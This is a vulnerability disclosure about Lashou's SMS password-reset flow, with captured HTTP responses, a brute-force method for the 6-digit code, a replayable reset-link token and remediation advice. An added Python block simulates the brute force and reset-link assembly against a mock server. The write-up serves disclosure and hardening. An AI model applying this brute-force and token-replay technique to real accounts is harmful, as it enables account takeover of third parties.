Today I found that I had forgotten my username when logging in to Lashou (lashou.com), and while sorting that out I noticed the problem described below. I tested it with my own phone number. On the login page, click "forgot password" to reach the password retrieval page and choose "retrieve via text message". After the mobile phone number is entered, the target phone receives a random 6-digit verification code. Capture the request when the verification code is submitted; the server answers with the data below. Next, brute force the verification code and compare the responses. Error response:
HTTP/1.1 200 OK
Date: Sun, 21 Jul 2013 03:13:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Server: LWS
Via: web-1-50
Vary: Accept-Encoding

{"status":5,"msg":"\u9a8c\u8bc1\u7801\u9519\u8bef"}

(The escaped msg decodes to 验证码错误, "verification code error".)
Correct response:
HTTP/1.1 200 OK
Date: Sun, 21 Jul 2013 03:13:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Server: LWS
Via: web-1-48
Vary: Accept-Encoding

{"status":1,"msg":"MTg2MDA5M*******I am a mosaic*********NTc5MkB*********jQxOXwzNDQwMDI3NTZkOTY4**********hMA%3D%3D"}
This yields the correct verification code. However, after repeated tests I found that a Lashou verification code is valid only once: once the code has been entered on the password modification page, going back and submitting it again no longer works. So the code we brute forced is useless, because the brute-force attempt itself has already consumed it. Is there really no way through here? Just as I was about to give up, I remembered something: when I had used the mailbox option to retrieve a password, the reset link it sent could be used to reset the password for as long as the link was valid, with no limit on the number of times it could be used. That link has the form http://www.lashou.com/account/reset?code=[this code looked very familiar]. On comparison, it turned out to be exactly the value returned in the msg field of the correct response during the brute-force guessing. So the reset link can be assembled directly: http://www.lashou.com/account/reset?code=MTg2MDA5M*******I am a mosaic********NTc5MkB*********jQxOXwzNDQwMDI3NTZkOTY4**********hMA%3D%3D and opening it allows the target user's password to be reset!
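The whole flow described above, as an added example that is not part of the original report: a Python simulation of the verification endpoint, the brute-force loop that tells the two responses apart by their JSON status field, the single-use behaviour of the code, and the assembly of the reset link from the msg token. The mock server, the secret code 031337, the TOKEN value and the max_attempts lockout knob are all constructed for the demonstration (the real site evidently had no attempt limit); only the reset path and the two response shapes come from the report.

```python
import base64
import json
import urllib.parse

RESET_URL = "http://www.lashou.com/account/reset"  # reset path quoted in the report
WRONG_CODE_MSG = "\u9a8c\u8bc1\u7801\u9519\u8bef"   # "验证码错误": verification code error

# Constructed stand-in for the base64 token seen in the capture; the real
# token's contents are masked in the report and are not reproduced here.
TOKEN = urllib.parse.quote(base64.b64encode(b"18600090000|constructed|20130721").decode())


class MockSmsResetService:
    """Constructed stand-in for the server side of the flow.

    It mirrors the two observed behaviours: the 6-digit code is accepted
    once and then rejected, while the reset token it hands out can be used
    any number of times.  max_attempts is a hypothetical hardening knob
    (the real site evidently had none) used to show the brute force failing.
    """

    def __init__(self, secret_code, token, max_attempts=None):
        self.secret_code = secret_code
        self.token = token            # already percent-encoded, as in the capture
        self.max_attempts = max_attempts
        self.attempts = 0
        self.code_used = False
        self.resets = 0

    def verify(self, code):
        """Raw JSON body: status 5 on a wrong code, status 1 plus token on success."""
        self.attempts += 1
        if self.max_attempts is not None and self.attempts > self.max_attempts:
            return json.dumps({"status": 9, "msg": "too many attempts"})  # hypothetical lockout
        if code == self.secret_code and not self.code_used:
            self.code_used = True          # the code is valid exactly once
            return json.dumps({"status": 1, "msg": self.token})
        return json.dumps({"status": 5, "msg": WRONG_CODE_MSG})

    def reset(self, link):
        """Accepts the reset link if its code= value matches the issued token; never expires it."""
        query = urllib.parse.urlsplit(link).query
        code = urllib.parse.parse_qs(query).get("code", [""])[0]
        if code != urllib.parse.unquote(self.token):
            return False
        self.resets += 1
        return True


def verify_status(verify, code):
    """Status field of a single verification attempt."""
    return json.loads(verify(code)).get("status")


def brute_force_code(verify, digits=6):
    """Tries every code 000000..999999 in order, telling responses apart by
    the JSON status field exactly as the report does.  Stops at the first
    status 1 (returning the code and the msg token) or at any status other
    than 1/5, which would indicate a lockout or other unexpected answer."""
    for n in range(10 ** digits):
        code = f"{n:0{digits}d}"
        resp = json.loads(verify(code))
        status = resp.get("status")
        if status == 1:
            return code, resp["msg"]
        if status != 5:
            return None, None
    return None, None


def build_reset_link(token):
    """The msg value is already percent-encoded (note the trailing %3D%3D in
    the capture), so it is concatenated as-is rather than encoded again."""
    return f"{RESET_URL}?code={token}"


if __name__ == "__main__":
    svc = MockSmsResetService("031337", TOKEN)
    code, token = brute_force_code(svc.verify)
    print("code found:", code, "after", svc.attempts, "attempts")
    print("re-submitting the same code now gives status", verify_status(svc.verify, code))
    link = build_reset_link(token)
    print("reset link:", link)
    print("reset link works twice:", svc.reset(link), svc.reset(link))
```

Against the unthrottled mock the loop finds the code after 31,338 guesses, a second submission of the same code is rejected with status 5, and the assembled link still resets the account on every use. Against the mock with max_attempts set, the loop sees the unexpected status 9 on the sixth guess and gives up, which is the behaviour the real endpoint lacked.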
Solution:
The original plan was to brute force the verification code and use it to reset the user's password; that failed because the code is valid only once and the brute-force attempt itself consumes it. The point to understand before giving up is that the successful response already hands back the reset token in its msg field, and the reset link built from that token is not single-use. Two things therefore need fixing: the verification endpoint accepts an unlimited number of guesses at a 6-digit code (at most 1,000,000 possibilities), and the reset token it returns can be replayed without limit. Limit and throttle verification attempts per phone number, and make the reset token single-use and short-lived rather than a reusable link parameter.